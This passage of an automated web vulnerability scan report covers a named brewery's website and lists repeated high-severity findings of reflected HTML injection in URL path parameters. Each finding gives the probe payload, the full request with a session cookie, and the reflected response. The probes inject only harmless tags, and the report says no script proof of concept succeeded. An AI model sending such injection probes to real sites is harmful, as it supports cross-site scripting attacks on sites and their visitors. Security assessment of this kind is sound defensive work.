This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /etcf2e31"><a>0c94de8f97e/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="etcf2e31"><a>0c94de8f97e_page" class="etcf2e31">
...[SNIP]...

1.269. http://www.ninkasibrewing.com/etc/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /etc/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 739ca"><a>0576c1b8f9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /etc739ca"><a>0576c1b8f9a/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="etc739ca"><a>0576c1b8f9a_page" class="etc739ca">
...[SNIP]...

1.270. http://www.ninkasibrewing.com/etc/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /etc/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a787d"><a>f50a6829e24 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /etca787d"><a>f50a6829e24/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="etca787d"><a>f50a6829e24_page" class="etca787d">
...[SNIP]...

1.271. http://www.ninkasibrewing.com/etc/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /etc/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba87c"><a>6ea40b41fee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /etcba87c"><a>6ea40b41fee/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="etcba87c"><a>6ea40b41fee_page" class="etcba87c">
...[SNIP]...

1.272. http://www.ninkasibrewing.com/facebook/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c518f"><a>4156b07e886 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookc518f"><a>4156b07e886/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebookc518f"><a>4156b07e886_page" class="facebookc518f">
...[SNIP]...

1.273. http://www.ninkasibrewing.com/facebook/content/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21e10"><a>2532c6c50e8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook21e10"><a>2532c6c50e8/content/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebook21e10"><a>2532c6c50e8_page" class="facebook21e10">
...[SNIP]...

1.274. http://www.ninkasibrewing.com/facebook/content/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8c9b"><a>1c3467f82f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookb8c9b"><a>1c3467f82f1/content/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebookb8c9b"><a>1c3467f82f1_page" class="facebookb8c9b">
...[SNIP]...

1.275. http://www.ninkasibrewing.com/facebook/content/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7836"><a>bb24dd3b3b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookf7836"><a>bb24dd3b3b/content/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebookf7836"><a>bb24dd3b3b_page" class="facebookf7836">
...[SNIP]...

1.276. http://www.ninkasibrewing.com/facebook/content/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67062"><a>59511a09909 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook67062"><a>59511a09909/content/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebook67062"><a>59511a09909_page" class="facebook67062">
...[SNIP]...

1.277. http://www.ninkasibrewing.com/facebook/content/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31fe0"><a>2eb4b172801 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook31fe0"><a>2eb4b172801/content/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebook31fe0"><a>2eb4b172801_page" class="facebook31fe0">
...[SNIP]...

1.278. http://www.ninkasibrewing.com/facebook/content/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f53d2"><a>1133f8e8031 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookf53d2"><a>1133f8e8031/content/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebookf53d2"><a>1133f8e8031_page" class="facebookf53d2">
...[SNIP]...

1.279. http://www.ninkasibrewing.com/facebook/content/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 704d2"><a>ebeab4721f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook704d2"><a>ebeab4721f5/content/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebook704d2"><a>ebeab4721f5_page" class="facebook704d2">
...[SNIP]...

1.280. http://www.ninkasibrewing.com/facebook/content/css/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/css/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1594"><a>1401768ab81 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebooka1594"><a>1401768ab81/content/css/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebooka1594"><a>1401768ab81_page" class="facebooka1594">
...[SNIP]...

1.281. http://www.ninkasibrewing.com/facebook/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f005"><a>fa78dd29b61 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook9f005"><a>fa78dd29b61/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/facebook/
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebook9f005"><a>fa78dd29b61_page" class="facebook9f005">
...[SNIP]...

1.282. http://www.ninkasibrewing.com/facebook/content/css/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/css/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbe47"><a>8cda79bb80c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookbbe47"><a>8cda79bb80c/content/css/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebookbbe47"><a>8cda79bb80c_page" class="facebookbbe47">
...[SNIP]...

1.283. http://www.ninkasibrewing.com/facebook/content/css/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/css/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b8ba"><a>7af1c205d94 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook7b8ba"><a>7af1c205d94/content/css/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebook7b8ba"><a>7af1c205d94_page" class="facebook7b8ba">
...[SNIP]...

1.284. http://www.ninkasibrewing.com/facebook/content/css/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/css/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44ab5"><a>a58806edc78 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook44ab5"><a>a58806edc78/content/css/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebook44ab5"><a>a58806edc78_page" class="facebook44ab5">
...[SNIP]...

1.285. http://www.ninkasibrewing.com/facebook/content/css/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/css/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbbed"><a>dadadead8f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookfbbed"><a>dadadead8f3/content/css/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebookfbbed"><a>dadadead8f3_page" class="facebookfbbed">
...[SNIP]...

1.286. http://www.ninkasibrewing.com/facebook/content/css/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/css/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 233db"><a>e5397f42874 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

